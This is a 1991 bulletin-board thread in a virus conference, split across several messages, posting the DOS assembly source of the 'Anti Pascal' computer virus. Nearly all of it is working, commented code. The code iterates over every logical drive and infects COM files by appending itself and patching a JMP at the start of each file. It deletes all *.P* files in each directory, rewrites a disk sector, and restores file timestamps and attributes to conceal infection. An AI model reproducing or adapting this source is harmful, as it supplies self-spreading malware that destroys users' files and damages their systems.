int 21 ; Do it
call self ; Determine the virus' start
address
self:
pop si
sub si,offset self-v_const
; Save the number of logical drives in the system:
mov byte ptr [si+offset maxdrv-v_const],al
; Restore the first 4 bytes of the infected program:
mov ax,[si+offset first4-v_const]
mov word ptr ds:[offset start],ax
mov ax,[si+offset first4+2-v_const]
mov word ptr ds:[offset start+2],ax
mov ah,1A ; Set new DTA
lea dx,[si+offset mydta-v_const]
int 21 ; Do it
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:08) Number: 3563
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: ANTI PASCAL <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
pop ax ; Restore current drive in AL
push ax ; Keep it on stack
call inf_drive ; Proceed with the current drive
xor al,al ; For all logical drives in
the system
drv_lp:
call inf_drive ; Proceed with drive
jbe drv_lp ; Loop until no more drives
pop ax ; Restore the saved current drive
mov ah,0E ; Set it as current drive
mov dl,al
int 21 ; Do it
mov dx,80 ; Restore original DTA
mov ah,1A
int 21 ; Do it
mov si,offset start
pop dx ; Restore DX & AX
pop ax
jmp si ; Run the original program
inf_drive:
push ax ; Save the selected drive number
on stack
mov ah,0E ; Select that drive
mov dl,al
int 21 ; Do ti
pop ax ; Restore AX
push ax ; Save the registers used
push bx
push cx
push si ; Save SI
mov cx,1 ; Read sector #50 of the drive
specified
mov dx,50d
lea bx,[si+offset v_end-v_const]
push ax ; Save AX
push bx ; Save BX, CX & DX also
push cx
push dx
int 25 ; Do read
pop dx ; Clear the stack
pop dx ; Restore saved DX, CX & BX
pop cx
pop bx
jnc wr_drive ; Write the information back if no
error
pop ax ; Restore AX
pop si ; Restore SI
drv_xit:
pop cx ; Restore used registers
pop bx
pop ax
inc al ; Go to next drive number
cmp al,[si+offset maxdrv-v_const] ; See if there
are more drives
xit:
ret ; Exit
wr_drive:
pop ax ; Restore drive number in AL
int 26 ; Do write
pop ax ; Clear the stack
pop si ; Restore Si
jnc cont ; Continue if no error
clc
jmp drv_xit ; Otherwise exit
; Find first COM file on the current directory of the selected drive:
cont:
mov ah,4E
xor cx,cx ; Normal files only
lea dx,[si+offset allcom-v_const] ; File mask
next:
int 21 ; Do find
jc no_more ; Quit search if no more such files
lea dx,[si+offset namez-v_const] ; Get file name
found
call infect ; Infect that file
mov ah,4F ; Prepare for FindNext
jc next ; If infection not successful,
go to next file
jmp drv_xit ; Otherwise quit
no_more:
mov ah,13 ; Delete all *.P* files in
that dir
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:08) Number: 3564
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: ANTI PASCAL <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
lea dx,[si+offset allp-v_const]
int 21 ; Do it
clc
jmp drv_xit ; Done. Exit
namaddr dw ? ; Address of the file name buffer
infect:
mov [si+offset namaddr-v_const],dx ; Save file
name address
mov ax,4301 ; Reset all file attributes
xor cx,cx
int 21 ; Do it
jc xit ; Exit on error
mov ax,3D02 ; Open file for both reading and
writing
int 21
jc xit ; Exit on arror
mov bx,ax ; Save file handle in BX
mov cx,4 ; Read the first 4 bytes of the
file
mov ah,3F
lea di,[si+offset first4-v_const] ; Save them in
first4
mov dx,di
int 21 ; Do it
jc quit ; Exit on error
cmp byte ptr [di+3],0CA ; File already infected?
stc ; Set CF to indicate it
jz quit ; Don't touch this file if so
mov cx,[si+offset fsize-v_const]
cmp cx,2048d ; Check if file size >= 2048 bytes
jb quit ; Exit if not
cmp cx,64000d ; Check if file size <= 64000
bytes
stc ; Set CF to indicate it
ja quit ; Exit if not
xor cx,cx ; Seek to file end
xor dx,dx
mov ax,4202
int 21 ; Do it
push ax ; Save file size on stack
jc quit ; Exit on error
; Write the virus body after the end of file:
mov cx,v_end-v_start
nop
lea dx,[si+offset v_start-v_const]
mov ah,40
int 21 ; Do it
jc quit ; Exit on error
pop ax ; Restore file size in AX
; Form a new address for the first JMP instruction in AX:
add ax,v_entry-v_start-3
mov byte ptr [di],0E9 ; JMP opcode
mov [di+1],ax
mov byte ptr [di+3],0CA ; Set the "file
infected" sign
xor cx,cx ; Seek to file beginning
xor dx,dx
mov ax,4200
int 21 ; Do it
jc quit ; Exit on error
mov cx,4 ; Write the new first 4 bytes
of the file
mov dx,di
mov ah,40
int 21 ; Do it
quit:
pushf ; Save flags
mov ax,5701 ; Set file date & time
mov cx,[si+offset time-v_const] ; Get time from
mydta
mov dx,[si+offset date-v_const] ; Get date from
mydta
int 21 ; Do it
mov ah,3E ; Close the file
int 21
mov ax,4301 ; Set file attributes
mov cl,[si+offset attrib-v_const] ; Get them
from mydta
xor ch,ch
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:08) Number: 3565
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: ANTI PASCAL <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
mov dx,[si+offset namaddr-v_const] ; Point to
file name
int 21 ; Do it
popf ; Restore flags
ret
v_end equ $
code ends
end start
---
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506